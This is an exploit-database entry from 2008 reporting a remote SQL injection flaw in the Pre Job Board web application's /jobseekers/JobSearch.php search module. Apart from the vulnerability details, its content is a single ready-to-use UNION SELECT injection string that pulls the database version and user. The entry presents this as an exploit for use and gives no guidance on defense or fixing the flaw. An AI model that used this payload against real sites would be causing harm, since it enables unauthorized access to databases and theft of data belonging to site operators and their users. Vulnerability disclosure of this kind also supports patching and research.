Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability

2008-06-14T00:00:00
ID 1337DAY-ID-3177
Type zdt
Reporter JosS
Modified 2008-06-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Pre Job Board (JobSearch.php) Remote SQL Injection Vulnerability
================================================================



[+] Info:

[~] Bug found by JosS
[~] EspSeC & Hack0wn!.

[~] Software: Pre Job Board (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: JobSearch.php

[~] /jobseekers/JobSearch.php (search module)

[+] Exploit:

[~] ' and 1=2 union all select 1,2,3,4,version(),user(),7,8,9,0,1,2,3,4,5/*




#  0day.today [2018-04-06]  #